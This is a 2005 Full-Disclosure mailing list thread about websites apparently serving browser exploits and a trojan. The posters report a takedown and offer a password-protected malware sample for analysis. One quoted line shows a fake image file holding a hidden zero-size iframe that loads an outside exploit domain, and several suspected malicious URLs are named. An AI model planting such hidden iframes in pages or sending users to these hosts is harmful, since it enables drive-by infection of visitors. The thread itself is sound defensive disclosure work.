mailing list archives
From: <yorn () governmentsecurity org>
Date: Tue, 4 Oct 2005 19:52:01 +0200
x.chm contains money.exe (needs to be added to virusscanners)
I don't have time to analyze the file, but it is attached here in a zip
file. Password to extract is 'money'. Anyone want to run some analysis?
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Aditya
Sent: Tuesday, October 04, 2005 11:35 AM
To: 'THORNTON Simon'
Cc: security () molecularmultimedia com; abuse () molecularmultimedia com;
webmaster () molecularmultimedia com
Subject: RE: [Full-disclosure] http://molecularmultimedia.com/
anexploitdistribution point (update2)
I've had the site www.ok-ok.biz disabled by the ISP, at least it will
deny the perps the ability to find out who has been compromised. The
site is obvioulsy just a front, will see what can be done about this.
The site was found after 2 different attempts here are more details
http://newvisioncc.org/photo/myphoto.jpg which is
<iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>
---- end myphoto.jpg
And http://traff.root-soft.com is
And molecularmultimedia.com is the front end to something more
Also visiting molecularmultimedia.com with mozilla with the latest
version of mozilla With all the patches still caued the trojan to be
executed - I found this from the Norton antivir logs ....
It's amazing looking at the page source, there are at least 4
different exploits (I'm still analysing this) encoded into the
And they are pretty good also - new 0day for mozilla also 1.7.12!
Will let you all know if I find anything!...
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- RE: http://molecularmultimedia.com/ yorn (Oct 04)